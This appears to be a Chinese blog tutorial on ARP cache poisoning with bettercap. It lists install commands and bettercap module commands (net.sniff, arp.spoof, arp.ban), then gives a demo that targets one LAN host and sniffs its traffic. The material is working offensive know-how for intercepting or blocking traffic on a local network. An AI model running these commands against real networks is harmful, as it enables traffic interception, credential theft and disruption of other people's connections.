ARP 欺骗与 Bettercap 实践应用

ARP 欺骗与 Bettercap 实践应用

首先安装常用的工具:

apt-get install dsniff ssldump

Windows 常用基础命令

arp -a 查看所有缓存
arp -d 删除缓存,需管理员权限

ARP 攻击原理,专业话语:ARP 缓存投毒。

根据自己的操作系统下载 bettercap 软件:

解压到 Linux 目录下可以直接进行运行:

/mnt/hgfs/Share/kali share/bettercap_linux_amd64/
sudo ./bettercap    运行
net.sniff on 
net.sniff off
net.sniff stats
get *   查看信息
在执行./bettercap之前进行如下操作
set net.sniff.output  xxx.pcap
set net.sniff.regexp xx2.cc    嗅探xx2.cc这个网站的信息
打开已保存的嗅探包也可以使用wireshark

Bettercap Shell 核心命令

命令 描述
Help MODULE 查看 MODULE 的信息
active 打印所有运行的模块
quit 退出 bettercap shell

Bettercap 模块详解

events.stream

描述:将事件打印为连续流。

命令 描述
events.stream on 开始事件流

net.recon

描述:周期性查看 ARP 缓存,用于管理网络中的新主机。

arp.spoof

模块介绍:对该网络中的主机进行 ARP 欺骗。

命令 描述
arp.spoof on 开启 ARP 欺骗,实现二层转发
arp.ban on 开启 ARP 欺骗,并进行阻断

实战演示

在电脑 A【192.168.199.101】上,没有进行 arp.sniff 操作之前 MAC 是没有变化的,当电脑 B 进行 HTTP 代理注入后,在电脑 A 上的操作就会弹窗:

在电脑 B【192.168.199.182】上执行:

set arp.spoof.targets 192.168.199.101
arp.spoof on

核心流程总结

  1. ARP 欺骗流量劫持:设置目标并开启欺骗。
  2. 开启嗅探:执行 net.sniff on 捕获数据包。
转载请注明出处:  https://www.cntworld.cn
智能工控 » ARP 欺骗与 Bettercap 实践应用

发表回复

提供最优质的资源集合

立即查看 了解详情
文章加载时间:0.0053 秒